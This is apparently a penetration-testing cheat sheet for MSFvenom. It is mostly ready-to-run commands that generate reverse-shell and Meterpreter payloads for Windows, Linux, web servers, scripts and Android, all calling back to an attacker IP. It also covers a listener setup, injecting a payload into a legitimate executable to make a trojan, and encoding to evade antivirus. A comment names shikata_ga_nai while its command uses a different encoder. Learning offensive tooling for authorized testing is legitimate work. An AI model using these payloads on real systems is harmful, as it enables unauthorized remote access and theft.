What is MSFvenom?
MSFvenom is Metasploit Framework's unified payload generator and encoder. It replaced the older msfpayload and msfencode tools by merging both functions into a single command. With MSFvenom, security professionals can generate shellcode and standalone executables for virtually any target platform — Windows, Linux, macOS, Android, PHP, Python, and more — in dozens of output formats including .exe, .apk, .elf, raw shellcode, and PowerShell scripts.
Generated payloads are typically used alongside a Metasploit listener (multi/handler) to catch incoming reverse shell connections during authorized penetration tests. Encoding options help evade basic signature-based antivirus detection in lab and CTF environments.
MSFvenom generates malicious executables. Only use in authorized lab environments, CTF challenges, or systems you have explicit written permission to test. Creation or deployment of payloads against unauthorized targets violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
# MSFvenom is bundled with Metasploit Framework (pre-installed on Kali) sudo apt update sudo apt install metasploit-framework -y # Verify msfvenom --version # List all available payloads msfvenom --list payloads # List all output formats msfvenom --list formats # List all encoders msfvenom --list encoders
Understanding Payload Types
MSFvenom payloads fall into two main categories. Choosing the right one depends on your network setup and the target environment.
# REVERSE SHELL — target connects back to your machine (most common) # Use when: you can receive inbound connections on your attack machine # LHOST = your IP, LPORT = port you're listening on # BIND SHELL — payload opens a port on the target, you connect to it # Use when: target is reachable but you can't receive inbound connections # LHOST not needed, LPORT = port that opens on the target # Stageless payloads (recommended for reliability): # windows/x64/shell_reverse_tcp — single self-contained payload # Staged payloads (smaller initial stager, pulls stage from listener): # windows/x64/shell/reverse_tcp — requires active Metasploit handler
Windows Payloads
# Stageless reverse TCP shell (.exe) — Windows 64-bit msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o shell.exe # Staged Meterpreter reverse HTTPS — Windows 64-bit (encrypted comms) msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.5 LPORT=443 -f exe -o meter.exe # 32-bit reverse shell (for older 32-bit Windows targets) msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o shell32.exe # Inject payload into an existing legitimate .exe (template) msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 \ -x /usr/share/windows-binaries/plink.exe -f exe -o trojan.exe # PowerShell one-liner payload msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f psh -o payload.ps1
Linux Payloads
# Linux 64-bit reverse shell ELF binary msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f elf -o shell.elf # Linux Meterpreter reverse TCP msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f elf -o meter.elf # Make the binary executable after transfer chmod +x shell.elf
Web & Script Payloads
# PHP reverse shell (upload to vulnerable web app) msfvenom -p php/reverse_php LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.php # Python reverse shell msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.py # Bash reverse shell msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.sh # JSP reverse shell (for Java-based servers like Tomcat) msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.jsp # WAR file for Tomcat deployment msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f war -o shell.war
Android Payload
# Android APK reverse shell (lab use only) msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -o shell.apk
Encoding Payloads
Encoders transform the raw shellcode to avoid simple signature detection. Note that modern AV solutions are not reliably bypassed by encoding alone — this is most useful in CTF and lab environments.
# Encode with shikata_ga_nai (most common encoder, polymorphic) msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 \ -e x64/xor_dynamic -i 5 -f exe -o encoded.exe # -e: encoder to use # -i: number of encoding iterations (more = harder to detect) # List encoders compatible with a payload msfvenom -p windows/shell_reverse_tcp --list-options # Encode and remove bad characters (important for buffer overflow exploits) msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 \ -b "\x00\x0a\x0d" -f c # -b: bad characters to avoid in the shellcode output # -f c: output as C array (for embedding in exploit code)
Setting Up the Listener
Every reverse shell payload needs a listener running on your attack machine before the payload executes on the target.
# Start Metasploit and set up a multi/handler listener msfconsole -q use exploit/multi/handler set PAYLOAD windows/x64/shell_reverse_tcp set LHOST 10.10.10.5 set LPORT 4444 run # For Meterpreter payloads, match the payload exactly: set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST 10.10.10.5 set LPORT 443 run # Quick one-liner to start a listener without msfconsole msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/shell_reverse_tcp; set LHOST 10.10.10.5; set LPORT 4444; run"
Common Flags
-p— Payload to use (e.g.windows/x64/shell_reverse_tcp)LHOST— Your IP address (attacker machine)LPORT— Port to listen on / connect back to-f— Output format:exe,elf,raw,c,psh,war,apk, etc.-o— Output file path-e— Encoder to use-i— Number of encoding iterations-b— Bad characters to exclude from shellcode-x— Template executable to inject payload into--list payloads— List all available payloads--list formats— List all supported output formats--list encoders— List all available encoders--list-options— Show options for a specific payload
Common Use Cases
- Generating reverse shells for post-exploitation after initial access
- Creating payloads for client-side attacks (phishing, USB drops) in authorized red team ops
- Producing raw shellcode for embedding in custom buffer overflow exploits
- CTF challenges requiring reverse shell or RCE exploitation
- Testing EDR and antivirus detection capabilities in controlled lab environments
- Android security research on lab devices
Further Reading
MSFvenom is one half of the equation — understanding how to catch and interact with sessions using msfconsole and Meterpreter is equally important. For AV evasion beyond basic encoding, explore tools like Veil, Shellter, and custom payload obfuscation techniques. Practice the full payload deployment cycle on TryHackMe rooms like "Blue", "Ice", and "Steel Mountain", and on hackzia.site labs.